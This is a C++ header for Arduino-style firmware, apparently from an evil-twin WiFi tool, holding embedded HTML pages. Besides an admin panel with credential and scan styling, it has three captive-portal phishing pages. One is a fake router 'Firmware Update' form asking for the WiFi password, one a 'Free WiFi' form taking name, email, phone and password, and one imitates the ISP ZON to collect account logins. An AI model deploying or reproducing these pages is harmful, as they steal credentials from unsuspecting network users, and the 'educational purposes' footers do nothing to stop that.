#pragma once
#include <Arduino.h>
// Auto-generated by tools/embed_html.py during build. Do not edit manually.
static const char ADMIN_HEADER_HTML[] PROGMEM = R"ADMINHTML(<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
  <title>%TITLE%</title>
  <style>
    :root { 
      --primary: #6366f1; 
      --primary-dark: #4f46e5; 
      --primary-grad: linear-gradient(135deg, #667eea 0%, #764ba2 100%); 
      --bg: #0f172a; 
      --card-bg: #1e293b; 
      --text: #e2e8f0; 
      --text-muted: #94a3b8;
      --border: #334155;
      --success: #10b981;
      --danger: #ef4444;
      --warning: #f59e0b;
    }
    * { box-sizing: border-box; margin: 0; padding: 0; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Helvetica, Arial, sans-serif; }
    body { background: var(--bg); color: var(--text); padding-bottom: 30px; }
    .container { max-width: 900px; margin: 0 auto; padding: 20px; }
    .header { 
      background: var(--primary-grad); 
      color: white; 
      padding: 30px; 
      border-radius: 16px; 
      box-shadow: 0 8px 32px rgba(102, 126, 234, 0.3); 
      margin-bottom: 25px; 
      text-align: center;
      position: relative;
      overflow: hidden;
    }
    .header::before {
      content: '';
      position: absolute;
      top: -50%;
      left: -50%;
      width: 200%;
      height: 200%;
      background: radial-gradient(circle, rgba(255,255,255,0.1) 0%, transparent 70%);
      animation: pulse 4s ease-in-out infinite;
    }
    @keyframes pulse {
      0%, 100% { transform: scale(1); opacity: 0.5; }
      50% { transform: scale(1.1); opacity: 0.8; }
    }
    .header h1 { position: relative; z-index: 1; font-size: 1.8rem; margin-bottom: 10px; font-weight: 700; }
    .card { 
      background: var(--card-bg); 
      border-radius: 16px; 
      padding: 24px; 
      margin-bottom: 20px; 
      box-shadow: 0 4px 20px rgba(0,0,0,0.3);
      border: 1px solid var(--border);
      transition: transform 0.2s, box-shadow 0.2s;
    }
    .card:hover {
      transform: translateY(-2px);
      box-shadow: 0 8px 30px rgba(0,0,0,0.4);
    }
    h2 { 
      font-size: 1.3rem; 
      margin-bottom: 18px; 
      border-bottom: 2px solid var(--border); 
      padding-bottom: 12px;
      color: var(--text);
      font-weight: 600;
    }
    .btn { 
      display: inline-block; 
      width: 100%; 
      padding: 14px; 
      border: none; 
      border-radius: 10px; 
      background: var(--primary-grad); 
      color: white; 
      font-weight: 600; 
      cursor: pointer; 
      text-decoration: none; 
      margin-bottom: 12px; 
      text-align: center;
      transition: all 0.2s;
      font-size: 0.95rem;
    }
    .btn:hover {
      transform: translateY(-2px);
      box-shadow: 0 4px 12px rgba(102, 126, 234, 0.4);
    }
    .btn:active {
      transform: translateY(0);
    }
    .btn.secondary { background: #475569; } 
    .btn.secondary:hover { background: #64748b; box-shadow: 0 4px 12px rgba(71, 85, 105, 0.4); }
    .btn.danger { background: var(--danger); } 
    .btn.danger:hover { background: #dc2626; box-shadow: 0 4px 12px rgba(239, 68, 68, 0.4); }
    .btn.success { background: var(--success); } 
    .btn.success:hover { background: #059669; box-shadow: 0 4px 12px rgba(16, 185, 129, 0.4); }
    input[type="text"], input[type="password"], input[type="email"], textarea, select { 
      width: 100%; 
      padding: 14px; 
      border: 1px solid var(--border); 
      border-radius: 10px; 
      margin-bottom: 12px;
      background: #0f172a;
      color: var(--text);
      font-size: 0.95rem;
      transition: border-color 0.2s, box-shadow 0.2s;
    }
    input:focus, textarea:focus, select:focus {
      outline: none;
      border-color: var(--primary);
      box-shadow: 0 0 0 3px rgba(99, 102, 241, 0.2);
    }
    .table-container { overflow-x: auto; border-radius: 10px; } 
    table { width: 100%; border-collapse: collapse; } 
    th {
      background: #0f172a;
      color: var(--text-muted);
      font-weight: 600;
      text-transform: uppercase;
      font-size: 0.75rem;
      letter-spacing: 0.05em;
      padding: 14px;
      text-align: left;
      border-bottom: 2px solid var(--border);
    }
    td { 
      padding: 14px; 
      text-align: left; 
      border-bottom: 1px solid var(--border);
      color: var(--text);
    }
    tr:hover td {
      background: rgba(99, 102, 241, 0.05);
    }
    .status-badge { 
      padding: 6px 14px; 
      border-radius: 20px; 
      font-size: 0.85rem; 
      background: #334155; 
      color: var(--text-muted);
      font-weight: 600;
      display: inline-block;
    }
    .active-badge { 
      background: rgba(16, 185, 129, 0.2); 
      color: var(--success); 
      padding: 6px 14px; 
      border-radius: 20px; 
      font-size: 0.85rem; 
      font-weight: 600;
      display: inline-block;
      border: 1px solid rgba(16, 185, 129, 0.3);
    }
    .live-dot { 
      height: 8px; 
      width: 8px; 
      background-color: var(--success); 
      border-radius: 50%; 
      display: inline-block; 
      animation: blink 1.5s infinite; 
      margin-right: 6px;
      box-shadow: 0 0 8px var(--success);
    }
    @keyframes blink { 
      0%, 100% { opacity: 1; transform: scale(1); } 
      50% { opacity: 0.4; transform: scale(0.8); } 
    }
    .cred-box { 
      background: rgba(245, 158, 11, 0.1); 
      border-left: 4px solid var(--warning); 
      padding: 16px; 
      margin-bottom: 12px; 
      word-wrap: break-word;
      border-radius: 8px;
      border-top: 1px solid var(--border);
      border-right: 1px solid var(--border);
      border-bottom: 1px solid var(--border);
    }
    .scan-info {
      color: var(--text-muted);
      font-size: 0.85rem;
      margin-bottom: 15px;
      font-style: italic;
    }
    .modal { 
      display: none; 
      position: fixed; 
      z-index: 1000; 
      left: 0; 
      top: 0; 
      width: 100%; 
      height: 100%; 
      background: rgba(0,0,0,0.7);
      backdrop-filter: blur(4px);
    }
    .modal-content { 
      background: var(--card-bg); 
      margin: 10% auto; 
      padding: 30px; 
      border-radius: 16px; 
      width: 90%; 
      max-width: 450px; 
      position: relative;
      border: 1px solid var(--border);
      box-shadow: 0 20px 60px rgba(0,0,0,0.5);
    }
    .close { 
      position: absolute; 
      right: 20px; 
      top: 15px; 
      font-size: 28px; 
      cursor: pointer; 
      color: var(--text-muted);
      transition: color 0.2s;
    }
    .close:hover { color: var(--text); }
    .password-wrapper { position: relative; }
    .password-wrapper input { padding-right: 45px; }
    .toggle-pw { 
      position: absolute; 
      right: 12px; 
      top: 50%; 
      transform: translateY(-50%); 
      background: none; 
      border: none; 
      cursor: pointer; 
      font-size: 20px;
      color: var(--text-muted);
      transition: color 0.2s;
    }
    .toggle-pw:hover { color: var(--text); }
    .modal-btns { display: flex; gap: 12px; margin-top: 18px; }
    .modal-btns .btn { margin-bottom: 0; }
    label {
      display: block;
      color: var(--text-muted);
      font-size: 0.9rem;
      margin-bottom: 8px;
      font-weight: 500;
    }
    @media (min-width: 600px) { 
      .btn-group { display: flex; gap: 12px; } 
      .btn { margin-bottom: 0; } 
    }
  </style>
</head>
<body><div class="container">)ADMINHTML";
static const char CAPTIVE_PORTAL_HTML[] PROGMEM = R"CAPTIVEHTML(<!DOCTYPE html>
<html>
<head>
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Security Check</title>
  <style>
    body { font-family: sans-serif; background: #eee; padding: 20px; text-align: center; }
    .box { background: white; padding: 30px; border-radius: 8px; box-shadow: 0 2px 10px rgba(0,0,0,0.1); }
    input { width: 100%; padding: 10px; margin: 10px 0; border: 1px solid #ccc; border-radius: 4px; }
    button { width: 100%; padding: 10px; background: #007bff; color: white; border: none; border-radius: 4px; cursor: pointer; }
  </style>
</head>
<body>
  <div class="box">
    <h2>Firmware Update</h2>
    <p>Please enter your WiFi password to update the Router firmware.</p>
    <form action="/" method="post">
      <input type="password" name="password" placeholder="WiFi Password" required>
      <button type="submit">Connect</button>
    </form>
  </div>
</body>
</html>
)CAPTIVEHTML";
static const char FREE_WIFI_REGISTER_HTML[] PROGMEM = R"FREEWIFIHTML(<!DOCTYPE html>
<html>
<head>
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Welcome to %SSID% Free WiFi</title>
  <style>
    * { box-sizing: border-box; margin: 0; padding: 0; }
    body { font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Helvetica, Arial, sans-serif; background: linear-gradient(135deg, #667eea 0%, #764ba2 100%); min-height: 100vh; display: flex; align-items: center; justify-content: center; padding: 20px; }
    .container { background: white; border-radius: 16px; box-shadow: 0 10px 40px rgba(0,0,0,0.2); padding: 40px 30px; width: 100%; max-width: 420px; }
    .wifi-icon { text-align: center; font-size: 48px; margin-bottom: 20px; }
    h1 { text-align: center; font-size: 1.4rem; color: #333; margin-bottom: 5px; }
    .ssid { color: #667eea; }
    .subtitle { text-align: center; color: #888; font-size: 0.9rem; margin-bottom: 25px; }
    .form-group { margin-bottom: 15px; }
    label { display: block; font-size: 0.85rem; color: #555; margin-bottom: 5px; font-weight: 500; }
    input { width: 100%; padding: 12px 14px; border: 1px solid #ddd; border-radius: 8px; font-size: 1rem; transition: border-color 0.2s; }
    input:focus { outline: none; border-color: #667eea; box-shadow: 0 0 0 3px rgba(102,126,234,0.15); }
    button { width: 100%; padding: 14px; background: linear-gradient(135deg, #667eea 0%, #764ba2 100%); color: white; border: none; border-radius: 8px; font-size: 1rem; font-weight: 600; cursor: pointer; margin-top: 10px; transition: transform 0.1s; }
    button:active { transform: scale(0.98); }
    .footer { text-align: center; margin-top: 25px; padding-top: 15px; border-top: 1px solid #eee; font-size: 0.7rem; color: #aaa; }
  </style>
</head>
<body>
  <div class="container">
    <div class="wifi-icon">&#128246;</div>
    <h1>Welcome to <span class="ssid">%SSID%</span> Free WiFi</h1>
    <p class="subtitle">To continue, please register</p>
    <form action="/" method="post">
      <div class="form-group">
        <label for="name">Full Name</label>
        <input type="text" id="name" name="name" placeholder="John Doe" required>
      </div>
      <div class="form-group">
        <label for="email">Email Address</label>
        <input type="email" id="email" name="email" placeholder="john@example.com" required>
      </div>
      <div class="form-group">
        <label for="phone">Phone Number</label>
        <input type="tel" id="phone" name="phone" placeholder="+351 912 345 678" required>
      </div>
      <div class="form-group">
        <label for="password">Create Password</label>
        <input type="password" id="password" name="password" placeholder="Create a password" required>
      </div>
      <button type="submit">Connect</button>
    </form>
    <div class="footer">This is a fake page for educational purposes.</div>
  </div>
</body>
</html>
)FREEWIFIHTML";
static const char ZON_ISP_VERIFY_HTML[] PROGMEM = R"ZONISPHTML(<!DOCTYPE html>
<html>
<head>
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>ZON - Account Verification</title>
  <style>
    * { box-sizing: border-box; margin: 0; padding: 0; }
    body { font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Helvetica, Arial, sans-serif; background: #f5f5f5; min-height: 100vh; display: flex; align-items: center; justify-content: center; padding: 20px; }
    .container { background: white; border-radius: 12px; box-shadow: 0 4px 20px rgba(0,0,0,0.1); width: 100%; max-width: 400px; overflow: hidden; }
    .header { background: linear-gradient(135deg, #5B2C8E 0%, #4A1A6B 100%); padding: 30px 25px; text-align: center; }
    .logo { font-size: 2rem; font-weight: 800; color: white; letter-spacing: 2px; }
    .logo span { color: #C9A4E8; }
    .body { padding: 30px 25px; }
    h2 { font-size: 1.2rem; color: #333; margin-bottom: 8px; }
    .description { color: #777; font-size: 0.9rem; line-height: 1.5; margin-bottom: 25px; }
    .form-group { margin-bottom: 18px; }
    label { display: block; font-size: 0.85rem; color: #555; margin-bottom: 6px; font-weight: 500; }
    input { width: 100%; padding: 12px 14px; border: 1px solid #ddd; border-radius: 6px; font-size: 1rem; transition: border-color 0.2s; }
    input:focus { outline: none; border-color: #5B2C8E; box-shadow: 0 0 0 3px rgba(91,44,142,0.1); }
    button { width: 100%; padding: 14px; background: #5B2C8E; color: white; border: none; border-radius: 6px; font-size: 1rem; font-weight: 600; cursor: pointer; transition: background 0.2s; }
    button:hover { background: #4A1A6B; }
    .alert { background: #fff3cd; border-left: 4px solid #ffc107; padding: 12px; margin-bottom: 20px; border-radius: 4px; font-size: 0.85rem; color: #856404; }
    .footer { text-align: center; padding: 15px 25px; border-top: 1px solid #eee; font-size: 0.7rem; color: #aaa; background: #fafafa; }
    .brand-footer { text-align: center; padding: 10px; font-size: 0.75rem; color: #999; }
  </style>
</head>
<body>
  <div class="container">
    <div class="header">
      <div class="logo">Z<span>O</span>N</div>
    </div>
    <div class="body">
      <h2>Account Verification</h2>
      <p class="description">To continue accessing the internet, please verify your ZON account credentials. This is required to maintain your connection on this network.</p>
      <div class="alert">Your session requires re-authentication to continue.</div>
      <form action="/" method="post">
        <div class="form-group">
          <label for="email">Email Address</label>
          <input type="email" id="email" name="email" placeholder="your@email.com" required>
        </div>
        <div class="form-group">
          <label for="password">Password</label>
          <input type="password" id="password" name="password" placeholder="Enter your password" required>
        </div>
        <button type="submit">Verify Account</button>
      </form>
      <div class="brand-footer">Powered by ZON</div>
    </div>
    <div class="footer">This is a fake page for educational purposes.</div>
  </div>
</body>
</html>
)ZONISPHTML";
static const char FOOTER_HTML[] PROGMEM = "</div></body></html>";
